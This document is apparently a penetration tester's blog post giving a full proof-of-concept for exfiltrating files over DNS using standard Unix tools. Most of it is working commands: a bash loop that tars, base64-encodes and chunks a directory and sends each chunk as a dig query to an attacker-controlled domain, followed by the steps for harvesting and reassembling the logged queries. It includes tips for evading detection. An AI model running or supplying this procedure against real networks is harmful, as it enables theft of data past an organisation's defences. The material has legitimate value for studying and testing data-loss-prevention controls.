data exfiltration via DNS with standard OS tools

the background

[Note: I didn't invent this technique; this is simply meant as a PoC for the interested. —grimm]

As a sometimes-penetration-tester, one of the things I check is the ability to exfiltrate (i.e., ship to a location under my control) any data I've stolen. (Actually, to ship out some data I've faked to look like the stuff I would be stealing, as it would be irresponsible to have my employers'/clients' live data strewn about.) The point is to see if I can sneak it past whatever countermeasures {we,they}'ve deployed against such activity (commonly called "Data Loss Prevention" technologies).

There may be lots of ways to do this, depending upon the security posture of the target environment, but if you find yourself facing a paucity of options when it comes to outbound connectivity, one Internet-reaching service almost all environments permit to machines within is recursive DNS resolution. The nice thing about recursive DNS is that even if my adversary (the target's defenders) have blocked the ability of "inside" machines to make DNS requests directly of "outside" servers, they'll typically allow access to their own DNS servers, and that's just as good. Mostly. (More on that later.)

Anyway, here's one way we can leverage DNS to our advantage using nothing more than bash and tools that are almost certainly installed on any Unix-like OS (and should be adaptable to Windows with a modest amount of cmd.exe-Fu or PowerShell):

the bullet list

configure nameservers you control for query logging
chunk data into (less-than-60-)byte-sized morsels
come up with some way to keep them in the right order and check for missing chunks
make DNS requests within a fake subdomain of your domain with the chunks prepended
harvest the logged queries, reassemble into meaningful data

the full procedure

# DRAMATIS PERSONAE: # victim0 is our hijacked machine on the inside (running Mac OS X, in this case) # ns0.our-domain.tld and ns1.our-domain.tld, the authoritative nameservers for our-domain.tld, which we control (here, # running BIND 9.x on Linux) # secret-lair.our-domain.tld, where we'll reassemble and process the results # NOTA BENE: in order for this to work as described herein, the receiving nameservers (ns0 and ns1) MUST # implement query logging; this example presupposes BIND-9 style # query logging, generating lines that look like this sample (if # they don't, you'll need to adjust the parsing that awk does later): # [update 20190806: it's possible to achieve the results similar to BIND's query # logging using, e.g., tcpdump/Wireshark/Bro/Zeek.] [root@ns0 pentester]# grep query /var/log/messages | head -1 Jan 30 20:48:18 ns0 named[29085]: client 172.28.57.81#23406: view external: query: some-rr.our-domain.tld IN A -E # BEGIN on victim0 # if we're feeling like it won't betray our position, we can send a # little probe to make sure our DNS queries will make it all the way # home: [hijacked_account@victim0 dns_tx]$ dig +short www-Gb8RRyQ.our-domain.tld [hijacked_account@victim0 dns_tx]$ # the fact that this returns nothing is inconsequential: all that # matters is whether we can find it in our nameserver logs # LOGIN to ns0 (and ns1 if necessary) # yep, thar she blows: [root@ns0 pentester]# grep www-Gb8RRyQ /var/log/messages Jan 30 20:50:56 ns0 named[29085]: client 172.28.57.81#8844: view external: query: www-Gb8RRyQ.our-domain.tld IN A -E # (note that you'll want to check ns1 if you don't find it on ns0) # this is good, because now we know that our target environment's infrastructure # will be our willing accomplice in shipping data outwards # RETURN to victim0 # we'll be shipping two OpenOffice documents (a text doc and a spreadsheet) # "back to base" for analysis/etc.; here they are: [hijacked_account@victim0 dns_tx]$ file * alphanumeric.ods: OpenDocument Spreadsheet symphony.odt: OpenDocument Text # hashing them as an integrity check: [hijacked_account@victim0 dns_tx]$ openssl sha1 * SHA1(alphanumeric.ods)= 6846777a88957d1336c8a04b23f88c2b3ba83c70 SHA1(symphony.odt)= a393449a180395bb7bdcc8b3e34f7cbcb5a42c84 [hijacked_account@victim0 test]$ tag=BV5r4; count=0; for line in $(tar -czf - dns_tx | base64 -b 50); do q=`printf "%03d-%s.%s.our-domain.tld\n" $count $line $tag`; echo $q; dig +short $q 2>/dev/null; sleep 0.2; count=$[count+1]; done | tee dns_tx/dns_tx.log 000-H4sIAC106lIAA+16B1RUSbRtkyQnJUhSRHJscs4ZAckiOTXQAg.BV5r4.our-domain.tld 001-10N1lAkiAZoZWMIEkki+QgIEklCCg5g2SQnOGDjjPqw3nOWu/9.BV5r4.our-domain.tld 002-/996c1i3L133nF3nVnVVnVO1LSAwY5ArB+C/U4BAID8vL/WXO9.BV5r4.our-domain.tld ... 544-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld 545-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld 546-AAAAAAA=.BV5r4.our-domain.tld # ok, that was a lot; let's break it down: tag=BV5r4; # setting $tag, a completely-arbitrary identifier you'll use later to # yank all the logged queries pertaining to this transfer out of # your logfiles at the receiving end; can be anything; you just need # to be able to identify it later; also: might be best if it's not # entirely obvious (e.g., "STOLEN-DATA"), just in case the target's # DNS admins happen to be looking at their logs count=0; # initializing $count for use in properly-sequencing the segments for # reassembly at the receiving end for line in $(tar -czf - dns_tx | base64 -b 50); # if you're new to bash, this might be a little much; # let's break it down further, from the inside, out: tar -czf - dns_tx # our ill-gotten gains are in a directory called "dns_tx"; # we're one directory above that, using # tar to (-c)reate an archive of that directory as a # (-f)ile, gzip (-z) that archive, and spew it to # STDOUT, at which point we'll... | base64 -b 50 # ...pipe that to the STDIN of base64 which will # (you guessed it) base64-encode that binary stream, and # (-b)reak it into 50-character-wide lines # now, since that's all wrapped in "$( ... )", we're basically # telling for to iterate over each of the lines that # results and do the following with each line: do q=`printf "%03d-%s.%s.our-domain.tld\n" $count $line $tag`; # first, set $q to a string formatted to look like a (mostly) # legal DNS query: # [3-digit $count]-[$line of base64-encoded stuff].[that $tag from earlier].our-domain.tld # in this case, the first one looks like this (from above): 000-H4sIAC106lIAA+16B1RUSbRtkyQnJUhSRHJscs4ZAckiOTXQAg.BV5r4.our-domain.tld echo $q; # this just prints the query string for debugging purposes # (so we have something for comparison, later; we'll talk about # where this ends up in a moment) dig +short $q 2>/dev/null; # ah, finally, we get to make the DNS query; running dig with # +short aims to minimize the output, all of which should be useless; # same with the redirection of STDERR to /dev/null (2>/dev/null); each # time this runs, we've transmitted one segment of our stolen data...somewhere... sleep 0.2; # wait for 0.2 seconds before processing the next line; THIS ONE # MAY NOT BE PORTABLE: your sleep may only be capable of # integer seconds; so be it: your transfer will just take five times # as long; NOTE: if your target's security posture is rigid and mature, # you may want to consider making this value quite large...or even # randomizing it...your transfer will take longer, but you may stand # a better chance of evading detection count=$[count+1]; # increments our counter done # closes the loop | tee dns_tx/dns_tx.log # and splits the output (remember echo $q way up above?) # so that it shows up on the screen AND in a file in the dns_tx # directory called dns_tx.log # *whew* still with me? good. now... # if our target environment's DNS servers were forwarding our requests # to those nameservers we control AND we were logging, we should find # our goodies in the query logs # MOVE TO ns0.our-domain.tld and ns1.our-domain.tld # first, let's get those messages out of each nameserver's logs # and into a file: [root@ns0 pentester]# grep '\.BV5r4\.' /var/log/messages > dns_tx_ns0.txt [root@ns0 pentester]# [root@ns1 pentester]# grep '\.BV5r4\.' /var/log/messages > dns_tx_ns1_.txt [root@ns1 pentester]# # MOVE to secret-lair # finally, we transfer those files to secret-lair, where we'll # perform the reassembly (just for convenience's sake): [pentester@secret-lair dns_rx]$ scp ns0:./dns_tx_ns0.txt . ... [pentester@secret-lair dns_rx]$ scp ns1:./dns_tx_ns1.txt . ... [pentester@secret-lair dns_rx]$ cat dns_tx_ns0.txt dns_tx_ns1.txt | awk '{print $(NF-3)}' | awk -F '-' '{print $1 " " $2}' | sort -k1,1n | uniq > dns_tx.txt [pentester@secret-lair dns_rx]$ # ok, another complicated bash pipeline; here it is, step by step: cat dns_tx_ns0.txt dns_tx_ns1.txt # spit out the contents of both those files... | awk '{print $(NF-3)}' # ...and pipe the results to awk, which is set here # to split the line at any whitespace and print the fourth field # from the right ($NF == the rightmost field; $(NF-1) is the # second field from the right, etc.)... | awk -F '-' '{print $1 " " $2}' | sort -k1,1n | uniq > dns_tx.txt # ...which we then pipe to another awk, but this time, its # (-F)ield separator is the hyphen, and it will print the ($1)st field # from the left, a space, then the ($2)nd field from the left; this, # in turn... | sort -k1,1n # gets piped to sort which will, in this configuration, # order the lines based upon (-k)olumn (?) 1, (n)umerically; before... | uniq > dns_tx.txt # ...we pipe it to uniq to weed out any duplicates... > dns_tx.txt # ...and redirect the output to a file called dns_tx.txt # simplistic check: do we have the right number of lines? (see # similar command run on victim0, waaaaay up at the top) [pentester@secret-lair dns_rx]$ wc -l dns_tx.txt 547 dns_tx.txt # a little more telling: do we have every "packet" in the sequence? [pentester@secret-lair dns_rx]$ for i in $(seq 0 546); do str=`printf "%03d" $i`; ok=`egrep "^$str " dns_tx.txt`; if [ -z "$ok" ]; then echo "MISSING SEGMENT: $i"; fi; done [pentester@secret-lair dns_rx]$ # decipherment of this one is left as an exercise for the reader; # for comparison, here's what the output could look like if # some segments *were* missing: [pentester@secret-lair dns_rx]$ wc -l dns_tx.txt 543 dns_tx.txt # (we wanted 547 lines, remember?) [pentester@secret-lair dns_rx]$ for i in $(seq 0 546); do str=`printf "%03d" $i`; ok=`egrep "^$str " dns_tx.txt`; if [ -z "$ok" ]; then echo "MISSING SEGMENT: $i"; fi; done MISSING SEGMENT: 41 MISSING SEGMENT: 295 MISSING SEGMENT: 367 MISSING SEGMENT: 537 [pentester@secret-lair dns_rx]$ # hrm...I'd recommend going back to victim0, SELECTING A NEW $tag, and retransmitting # so, presuming our check output looked good (the first # of the two for i in $(seq 0 546)... examples, above), # we have a file whose contents look something like this: [pentester@secret-lair dns_rx]$ cat dns_tx.txt 000 H4sIAC106lIAA+16B1RUSbRtkyQnJUhSRHJscs4ZAckiOTXQAg.BV5r4.our-domain.tld 001 10N1lAkiAZoZWMIEkki+QgIEklCCg5g2SQnOGDjjPqw3nOWu/9.BV5r4.our-domain.tld 002 /996c1i3L133nF3nVnVVnVO1LSAwY5ArB+C/U4BAID8vL/WXO9.BV5r4.our-domain.tld ... 544 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld 545 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld 546 AAAAAAA=.BV5r4.our-domain.tld # look sort of familiar? # at this point, you can probably tell that what we need to do next: [pentester@secret-lair dns_rx]$ awk '{print $2}' dns_tx.txt | awk -F '.' '{print $1}' > dns_tx.b64 # ahem, OK, the breakdown (sorry; got excited for a moment, since # we're almost done): awk '{print $2}' dns_tx.txt # use awk to split each line of dns_tx.txt on whitespace # and return the ($2)nd field from the left... | awk -F '.' '{print $1}' # ...split *that* field (the DNS query we made from the victim0 machine) # at the period and return the ($1)st field from the left (our base64-encoded # goodies, right?), and... > dns_tx.b64 # redirect all that into a file called dns_tx.b64 (as a mnemonic # for the stage we're at; there's nothing magical about a ".b64" suffix) # finally, we'll transform the base64 encoded data back into # a binary stream (it was a gzipped tar archive, remember?)... [pentester@secret-lair dns_rx]$ base64 -di dns_tx.b64 > dns_tx.tgz # see? see? they never see... --Calvin [pentester@secret-lair dns_rx]$ file dns_tx.tgz dns_tx.tgz: gzip compressed data, from Unix, last modified: Thu Jan 30 20:47:57 2014 # now we can expand and explore the archive: [pentester@secret-lair dns_rx]$ tar -xzf dns_tx.tgz [pentester@secret-lair dns_rx]$ cd dns_tx # et voila; there they are (along with "dns_tx.log", # which we can ignore): [pentester@secret-lair dns_tx]$ file * alphanumeric.ods: OpenDocument Spreadsheet dns_tx.log: empty symphony.odt: OpenDocument Text [pentester@secret-lair dns_tx]$ openssl sha1 * SHA1(alphanumeric.ods)= 6846777a88957d1336c8a04b23f88c2b3ba83c70 SHA1(dns_tx.log)= da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA1(symphony.odt)= a393449a180395bb7bdcc8b3e34f7cbcb5a42c84 # fin.

in conclusion...

So, there you have it. Note that there are any number of variations you could make; for instance, if you wanted to encrypt the data (recommended, if you're going to be sassy enough to ship out the client's live goodies), you could insert some openssl goodness into the "packaging" and "reassembly" steps; you could rig up some more transmission-time error checking (you could reinvent TCP!); maybe you want shorter chunks of base64-encoded data to further evade detection. Possibilities abound.

If you're doing this stuff with the target's consent for purely ethical reasons and have questions, feel free to drop a line. I'm sure you can figure out how. ;-)

—grimm